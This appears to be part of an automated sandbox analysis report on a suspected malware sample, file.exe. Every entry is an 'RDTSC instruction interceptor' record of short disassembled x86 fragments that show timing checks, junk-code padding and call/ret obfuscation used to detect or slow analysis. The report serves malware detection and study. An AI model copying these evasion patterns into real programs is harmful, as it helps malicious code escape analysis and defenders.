                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9907 second address: 7C990B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C990B second address: 7C9916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA940 second address: 7CA944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA944 second address: 7CA94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC8F3 second address: 7CC924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F5ED4EAF47Ah 0x0000000e nop 0x0000000f mov bx, ax 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D18D7h], eax 0x0000001a push 00000000h 0x0000001c xor edi, 058F2320h 0x00000022 xchg eax, esi 0x00000023 je 00007F5ED4EAF48Bh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC924 second address: 7CC93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE97A second address: 7CE987 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE987 second address: 7CE99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE99A second address: 7CE99F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE99F second address: 7CEA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5ED52EEF76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F5ED52EEF78h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 jbe 00007F5ED52EEF78h 0x0000002e mov ebx, esi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 and ebx, dword ptr [ebp+122D3063h] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jmp 00007F5ED52EEF89h 0x00000049 mov dword ptr [ebp+122D18C7h], eax 0x0000004f mov eax, dword ptr [ebp+122D16E5h] 0x00000055 mov di, bx 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push edi 0x0000005d call 00007F5ED52EEF78h 0x00000062 pop edi 0x00000063 mov dword ptr [esp+04h], edi 0x00000067 add dword ptr [esp+04h], 00000014h 0x0000006f inc edi 0x00000070 push edi 0x00000071 ret 0x00000072 pop edi 0x00000073 ret 0x00000074 or ebx, dword ptr [ebp+122D18FCh] 0x0000007a nop 0x0000007b jnl 00007F5ED52EEF93h 0x00000081 jnp 00007F5ED52EEF8Dh 0x00000087 jmp 00007F5ED52EEF87h 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f js 00007F5ED52EEF81h 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0923 second address: 7D093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF484h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D093B second address: 7D0955 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5ED52EEF7Ch 0x00000008 jno 00007F5ED52EEF76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jbe 00007F5ED52EEF7Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0955 second address: 7D09A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5ED4EAF478h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 stc 0x00000027 push 00000000h 0x00000029 mov edi, 1CB9050Bh 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 jg 00007F5ED4EAF47Ch 0x00000036 pushad 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c popad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D09A2 second address: 7D09A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D09A6 second address: 7D09BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF485h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D09BF second address: 7D09C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1958 second address: 7D195C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3A2C second address: 7D3A8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F5ED52EEF78h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 or ebx, 0909379Fh 0x00000029 push 00000000h 0x0000002b jnl 00007F5ED52EEF7Ah 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F5ED52EEF78h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push ecx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 pop ecx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3A8E second address: 7D3ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5ED4EAF476h 0x00000009 jmp 00007F5ED4EAF482h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5ED4EAF47Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3ABD second address: 7D3AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3AC3 second address: 7D3AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5ED4EAF47Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3C33 second address: 7D3C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3C38 second address: 7D3C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5ED4EAF476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3C42 second address: 7D3CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5ED52EEF81h 0x0000000e nop 0x0000000f cld 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F5ED52EEF78h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 add dword ptr [ebp+122D18C1h], eax 0x0000003e mov eax, dword ptr [ebp+122D1231h] 0x00000044 jmp 00007F5ED52EEF83h 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, dword ptr [ebp+1245951Fh] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jng 00007F5ED52EEF76h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3CC2 second address: 7D3CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5953 second address: 7D5957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5957 second address: 7D595B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D595B second address: 7D5961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5961 second address: 7D5986 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5ED4EAF48Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5986 second address: 7D598C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4B3D second address: 7D4B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D598C second address: 7D5992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4B43 second address: 7D4B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5ED4EAF482h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D6AB2 second address: 7D6AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D6D32 second address: 7D6D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D6D36 second address: 7D6D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D6D3C second address: 7D6D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DA1C6 second address: 7DA1D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5ED52EEF76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DA456 second address: 7DA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E11C3 second address: 7E11C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0BBB second address: 7E0BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E297E second address: 7E2986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2986 second address: 7E298B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E298B second address: 7E29A8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5ED52EEF7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F5ED52EEF76h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jng 00007F5ED52EEF76h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E29A8 second address: 7E29B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7AD6 second address: 7E7AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7AEC second address: 7E7B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007F5ED4EAF47Fh 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7BDB second address: 7E7BE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7C9E second address: 7E7CA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EE195 second address: 7EE19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EE19D second address: 7EE1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EE1A3 second address: 7EE1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EE1A9 second address: 7EE1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1673 second address: 7C1677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ED3BC second address: 7ED3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ED7CF second address: 7ED7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDB16 second address: 7EDB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF481h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDB2B second address: 7EDB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDB2F second address: 7EDB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDE84 second address: 7EDEB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jg 00007F5ED52EEFB3h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5ED52EEF89h 0x00000014 jc 00007F5ED52EEF76h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5F70 second address: 7F5F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5F76 second address: 7F5F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5ED52EEF7Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C648B second address: 7C6507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F5ED4EAF478h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2FC6h], edi 0x0000002d sbb dl, FFFFFFF7h 0x00000030 lea eax, dword ptr [ebp+12488217h] 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F5ED4EAF478h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov edi, dword ptr [ebp+122D2AFFh] 0x00000056 nop 0x00000057 jnl 00007F5ED4EAF483h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6507 second address: 7A49D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F5ED52EEF78h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D3757h], ebx 0x00000028 call dword ptr [ebp+124649EDh] 0x0000002e pushad 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C66DD second address: 7C6704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F5ED4EAF476h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5ED4EAF483h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6704 second address: 7C670A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C699B second address: 7C699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6A8D second address: 7C6A93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6A93 second address: 7C6AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6AA3 second address: 7C6AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6B43 second address: 7C6B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6B5E second address: 7C6B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6B62 second address: 7C6B97 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 07BE0D87h 0x00000012 pushad 0x00000013 mov ebx, dword ptr [ebp+122D3398h] 0x00000019 mov esi, dword ptr [ebp+122D2CF7h] 0x0000001f popad 0x00000020 mov dword ptr [ebp+1245929Ah], eax 0x00000026 push 5F83B518h 0x0000002b push esi 0x0000002c pushad 0x0000002d jnc 00007F5ED4EAF476h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6C92 second address: 7C6C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6CF0 second address: 7C6D4E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F5ED4EAF488h 0x0000000e jmp 00007F5ED4EAF482h 0x00000013 xchg eax, esi 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F5ED4EAF478h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e stc 0x0000002f nop 0x00000030 jno 00007F5ED4EAF480h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6D4E second address: 7C6D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6D52 second address: 7C6D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6DEE second address: 7C6E12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e ja 00007F5ED52EEF76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6E12 second address: 7C6E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6E17 second address: 7C6E42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5ED52EEF82h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f jc 00007F5ED52EEF78h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
